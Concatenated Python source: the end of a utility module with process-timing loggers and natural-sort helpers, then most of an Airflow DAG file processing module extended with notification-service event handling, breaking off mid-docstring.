# Starting a thread may irrecoverably break various environments,
# e.g. MPI.
#
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, do not do it unless there is (weak)
# evidence of interactive use.
import sys
if sys.stdin is None:
# Can happen, e.g., if pudb is controlling the console.
use_late_start_logging = False
else:
use_late_start_logging = sys.stdin.isatty()
import os
if os.environ.get("PYTOOLS_LOG_NO_THREADS", ""):
use_late_start_logging = False
if use_late_start_logging:
try:
self.late_start_log_thread.start()
except RuntimeError:
# https://github.com/firedrakeproject/firedrake/issues/1422
#
# Starting a thread may fail in various environments, e.g. MPI.
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, tolerate failures of it without
# warning.
pass
self.timer = ProcessTimer()
def _log_start_if_long(self):
from time import sleep
sleep_duration = 10*self.long_threshold_seconds
sleep(sleep_duration)
if not self.is_done:
self.logger.log(
self.noisy_level, "%s: started %.gs ago",
self.description,
sleep_duration)
def done( # pylint: disable=keyword-arg-before-vararg
self, extra_msg=None, *extra_fmt_args):
self.timer.done()
self.is_done = True
wall_elapsed = self.timer.wall_elapsed
process_elapsed = self.timer.process_elapsed
completion_level = (
self.noisy_level
if wall_elapsed > self.long_threshold_seconds
else self.silent_level)
if process_elapsed is not None:
msg = "%s: completed (%.2fs wall, %.1fx CPU)"
fmt_args = [self.description, wall_elapsed, process_elapsed/wall_elapsed]
else:
msg = "%s: completed (%f.2s wall)"
fmt_args = [self.description, wall_elapsed]
if extra_msg:
msg += ": " + extra_msg
fmt_args.extend(extra_fmt_args)
self.logger.log(completion_level, msg, *fmt_args)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
class DebugProcessLogger(ProcessLogger):
default_noisy_level = logging.DEBUG
class log_process: # noqa: N801
"""A decorator that uses :class:`ProcessLogger` to log data about calls
to the wrapped function.
"""
def __init__(self, logger, description=None):
self.logger = logger
self.description = description
def __call__(self, wrapped):
def wrapper(*args, **kwargs):
with ProcessLogger(
self.logger,
self.description or wrapped.__name__):
return wrapped(*args, **kwargs)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, wrapped)
return new_wrapper
# }}}
# {{{ sorting in natural order
def natorder(item):
"""Return a key for natural order string comparison.
See :func:`natsorted`.
.. versionadded:: 2020.1
"""
import re
result = []
for (int_val, string_val) in re.findall(r"(\d+)|(\D+)", item):
if int_val:
result.append(int(int_val))
# Tie-breaker in case of leading zeros in *int_val*. Longer values
# compare smaller to preserve order of numbers in decimal notation,
# e.g., "1.001" < "1.01"
# (cf. https://github.com/sourcefrog/natsort)
result.append(-len(int_val))
else:
result.append(string_val)
return result
def natsorted(iterable, key=None, reverse=False):
"""Sort using natural order [1]_, as opposed to lexicographic order.
Example::
>>> sorted(["_10", "_1", "_9"]) == ["_1", "_10", "_9"]
True
>>> natsorted(["_10", "_1", "_9"]) == ["_1", "_9", "_10"]
True
:arg iterable: an iterable to be sorted. It must only have strings, unless
*key* is specified.
:arg key: if provided, a key function that returns strings for ordering
using natural order.
:arg reverse: if *True*, sorts in descending order.
:returns: a sorted list
.. [1] https://en.wikipedia.org/wiki/Natural_sort_order
.. versionadded:: 2020.1
"""
if key is None:
key = lambda x: x
return sorted(iterable, key=lambda y: natorder(key(y)), reverse=reverse)
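# Example (illustrative): natorder("file10") == ["file", 10, -2] compares greater than
# natorder("file9") == ["file", 9, -1], so natsorted(["file10", "file9"]) puts "file9" first.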
# }}}
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
# vim: foldmethod=marker
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import signal
import sys
import queue
import time
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple, Union, cast
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from notification_service.base_notification import EventWatcher, BaseEvent, BaseNotification
from notification_service.client import NotificationClient
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.events.scheduler_events import SCHEDULER_NAMESPACE, SchedulerInnerEventType
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""Processes a DAG file. See SchedulerJob.process_file() for more details."""
@abstractmethod
def start(self) -> None:
"""Launch the process to process the file"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""Terminate (and then kill) the process launched to process the file"""
raise NotImplementedError()
@abstractmethod
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
""":return: the PID of the process launched to process the given file"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Optional[Tuple[int, int]]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file() if available. Otherwise, none
:rtype: Optional[Tuple[int, int]]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self) -> datetime:
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self) -> str:
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
@property
@abstractmethod
def waitable_handle(self):
"""A "waitable" handle that can be passed to ``multiprocessing.connection.wait()``"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
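# Illustrative sketch of how the agent below is typically driven (the processor factory
# is a placeholder; argument values are assumptions, not taken from this module):
#
#     agent = DagFileProcessorAgent(
#         dag_directory="/path/to/dags", max_runs=-1,
#         processor_factory=my_processor_factory,
#         processor_timeout=timedelta(minutes=3),
#         dag_ids=None, pickle_dags=False, async_mode=True)
#     agent.start()        # forks the DagFileProcessorManager subprocess
#     agent.heartbeat()    # drains pending DagParsingStat messages, restarts if dead
#     agent.end()          # joins the manager and reaps its process group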
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: ([str, List[CallbackRequest], Optional[List[str]], bool]) -> (
AbstractDagFileProcessorProcess
)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
    :type pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[
[str, List[CallbackRequest], Optional[List[str]], bool], AbstractDagFileProcessorProcess
],
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
refresh_dag_dir_interval=0,
notification_service_uri=None
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.Process] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
self.refresh_dag_dir_interval = refresh_dag_dir_interval
self.notification_service_uri = notification_service_uri
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
# getattr prevents error while pickling an instance method.
getattr(self, "_processor_factory"),
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
self.refresh_dag_dir_interval,
self.notification_service_uri
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
        Should only be used when the DAG file processor manager is launched in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
self._parent_signal_conn.send(request)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_sla_callback_request_to_execute(self, full_filepath: str, dag_id: str) -> None:
"""
Sends information about the SLA callback to be executed by DagFileProcessor.
:param full_filepath: DAG File path
:type full_filepath: str
:param dag_id: DAG ID
:type dag_id: str
"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
try:
request = SlaCallbackRequest(full_filepath=full_filepath, dag_id=dag_id)
self._parent_signal_conn.send(request)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
self._sync_metadata(result)
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
refresh_dag_dir_interval=0,
notification_service_uri=None
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
dag_ids,
pickle_dags,
async_mode,
refresh_dag_dir_interval,
notification_service_uri
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class ProcessorManagerWatcher(EventWatcher, LoggingMixin):
def __init__(self, signal_queue: queue.Queue):
super().__init__()
self.signal_queue = signal_queue
def process(self, events: List[BaseEvent]):
for e in events:
self.log.debug("Listen Event: {}".format(e))
self.signal_queue.put((e, timezone.utcnow()))
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and put the results into a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: MultiprocessingConnection
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type pickle_dags: bool
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[CallbackRequest]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool = True,
refresh_dag_dir_interval=0,
notification_service_uri=None
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
self._refresh_dag_dir_interval = refresh_dag_dir_interval
self.notification_service_uri = notification_service_uri
self.ns_client: BaseNotification = None
self.signal_queue = queue.Queue()
if notification_service_uri is not None:
self.watcher = ProcessorManagerWatcher(self.signal_queue)
self.message_buffer: Dict[str, (BaseEvent, datetime)] = {}
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
            self.log.warning(
                "Because we cannot use more than 1 thread (parsing_processes = "
                "%d) when using sqlite, parallelism will be set to 1.",
                self._parallelism,
            )
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
        # How often to print out DAG file processing stats to the log. Defaults
        # to 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
        # How many seconds do we wait for tasks to heartbeat before marking them as zombies.
self._zombie_threshold_secs = conf.getint('scheduler', 'scheduler_zombie_task_threshold')
        # Whether to store DAG file source code in the database.
self.store_dag_code = STORE_DAG_CODE
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# TODO: Remove magic number
self._zombie_query_interval = 10
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
        # How often to scan the DAGs directory for new files. Defaults to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
self.remove_non_existent_dag: bool = conf.getboolean('scheduler', 'remove_non_existent_dag', fallback=True)
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, AbstractDagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
        # Ignore the debug dump signal (SIGUSR2), making it easier to send without affecting this process
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
self._listen_parse_dag_event()
return self._run_parsing_loop()
def _listen_parse_dag_event(self):
if self.notification_service_uri is not None:
            self.log.info('Start listening for PARSE_DAG_REQUEST events from {}'.format(self.notification_service_uri))
self.ns_client = NotificationClient(server_uri=self.notification_service_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.ns_client.start_listen_event(key='*',
event_type='PARSE_DAG_REQUEST',
namespace='*',
watcher=self.watcher,
start_time=int(time.time() * 1000))
def _stop_listen_events(self):
if self.ns_client is not None:
self.ns_client.stop_listen_event(key=None)
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
# pylint: disable=no-else-break
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
                # In "sync" mode we don't want to parse the DAGs until we
                # are told to (as that would open another connection to the
                # SQLite DB, which isn't a good practice).
                # This shouldn't happen, as in sync mode poll should block
                # forever. Let's be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(
self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
            # Send an event to notify that DAG parsing has finished
refresh_dag_dir_interval = time.monotonic() - loop_start_time
if refresh_dag_dir_interval < self._refresh_dag_dir_interval:
wait_time = self._refresh_dag_dir_interval - refresh_dag_dir_interval
else:
wait_time = 1.0
if self.notification_service_uri is not None and len(self.message_buffer) > 0:
self._process_and_send_response()
self.collect_results()
time.sleep(wait_time)
if self.signal_queue.qsize() > 0:
self._add_file_to_queue()
def _process_and_send_response(self):
for event, process_time in self.message_buffer.copy().values():
file_path = event.value
finish_process_time = self.get_last_finish_time(file_path)
duration = self.get_last_runtime(file_path)
if not finish_process_time or not duration:
continue
start_process_time = finish_process_time - timedelta(seconds=duration)
self.log.debug('Check dag processor start_process_time {} process_time {} file_path {}'
.format(start_process_time, process_time, file_path))
if start_process_time > process_time:
self.ns_client.send_event(BaseEvent(key=event.key,
value=file_path,
event_type=SchedulerInnerEventType.PARSE_DAG_RESPONSE.value))
self.message_buffer.pop(file_path)
def _add_file_to_queue(self):
for i in range(self.signal_queue.qsize()):
message, process_time = self.signal_queue.get()
file_path = message.value
if file_path in self._file_path_queue:
self._file_path_queue.remove(file_path)
self._file_path_queue.insert(0, file_path)
self.message_buffer[file_path] = (message, process_time)
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
        # Callbacks have a higher priority than DAG Run scheduling
if request.full_filepath in self._file_path_queue:
self._file_path_queue.remove(request.full_filepath)
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
if self.remove_non_existent_dag:
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # noqa pylint: disable=broad-except
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
        # Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
